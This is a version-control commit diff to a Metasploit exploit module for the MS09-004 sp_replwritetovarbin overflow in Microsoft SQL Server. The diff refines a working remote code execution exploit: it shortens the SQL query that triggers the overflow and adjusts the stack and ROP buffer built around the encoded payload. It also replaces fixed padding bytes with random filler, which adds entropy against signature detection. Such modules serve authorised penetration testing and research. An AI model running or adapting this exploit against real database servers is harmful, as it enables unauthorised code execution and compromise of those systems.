cleanup exceptions, optimize query length, add some entropy

git-svn-id: file:///home/svn/framework3/trunk@8153 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin.rb

@@ -40,10 +40,10 @@ class Metasploit3 < Msf::Exploit::Remote
 				4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with
 				  a displacement of 4. This pointer is not used by this exploit.
 
-				This particular exploit replaces the previous dual-method exploit. It uses 
+				This particular exploit replaces the previous dual-method exploit. It uses
 				a technique where the value contained in ecx becomes the stack. From there,
 				return oriented programming is used to normalize the execution state and
-				finally execute the payload via a "jmp esp". All addresses used were found 
+				finally execute the payload via a "jmp esp". All addresses used were found
 				within the sqlservr.exe memory space, yielding very reliable code execution
 				using only a single query.
 			},
@@ -253,9 +253,8 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# since we need to have credentials for this vuln, we just login and run a query
 		# to get the version information
-		version = mssql_query_version
-		if not version
-			return Exploit::CheckCode::Detected
+		if not (version = mssql_query_version)
+			return Exploit::CheckCode::Safe
 		end
 		print_status("@@version returned:\n\t" + version)
 
@@ -278,7 +277,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			print_status("Attempting automatic target detection...")
 
 			version = mssql_query_version
-			raise RuntimError, "Unable to get version!" if not version
+			raise RuntimeError, "Unable to get version!" if not version
 
 			if (version =~ /8\.00\.194/)
 				mytarget = targets[1]
@@ -307,12 +306,10 @@ class Metasploit3 < Msf::Exploit::Remote
 			mytarget = target
 		end
 
-		sqlquery = %Q|declare @i int,@buf nvarchar(4000)
-set @buf='declare @e int,@b varbinary,@l int;'
-set @buf=@buf+'exec master.dbo.sp_replwritetovarbin %NUM%,@e out,@b out,@l out,''%STUFF%'','''
-set @buf=@buf+'1'',''2'',''3'',''4'',''5'',''6'',''7'',''8'''
-exec master..sp_executesql @buf
-|
+		sqlquery = %Q|declare @i int,@z nvarchar(4000)
+set @z='declare @e int,@b varbinary,@l int;'
+set @z=@z+'exec sp_replwritetovarbin %NUM%,@e out,@b out,@l out,''%STUFF%'',@l,@l,@l,@l,@l,@l,@l,@l'
+exec sp_executesql @z|
 
 		# just crash it with a pattern buffer if the CRASHER target is selected..
 		if mytarget.name == 'CRASHER'
@@ -331,9 +328,10 @@ exec master..sp_executesql @buf
 			first_esp = mytarget['Popped']
 			fix_esp = mytarget['FixESP']
 			writable = mytarget['Writable']
-			
+			corruptable_bytes = 0x44
+
 			# make sploit buff
-			sz = (num + vt_off) + esp_off + 6 + 2 + 0x38 + payload.encoded.length
+			sz = (num + vt_off) + esp_off + (2 + corruptable_bytes) + payload.encoded.length
 			#sploit = Rex::Text.pattern_create(sz)
 			sploit = rand_text_alphanumeric(sz)
 
@@ -357,8 +355,8 @@ exec master..sp_executesql @buf
 			stack << mytarget['Ret']
 			stack = stack.pack('V*')
 			# jump over the stuff that gets corrupted
-			stack << "\xeb\x38"
-			stack << "\xcc" * 0x38
+			stack << "\xeb" + [corruptable_bytes].pack('C')
+			stack << rand_text_alphanumeric(corruptable_bytes)
 			stack << payload.encoded
 			sploit[stack_off,stack.length] = stack
 
@@ -447,9 +445,10 @@ exec master..sp_executesql @buf
 	def mssql_query_version
 		begin
 			logged_in = mssql_login_datastore
-		rescue ::ConnectionRefused
-			raise RuntimeError, "Unable to connect: connection refused"
+		rescue ::Rex::ConnectionError, ::Errno::ECONNRESET, ::Errno::EINTR
+			return nil
 		end
+
 		if (not logged_in)
 			raise RuntimeError, "Invalid SQL Server credentials"
 		end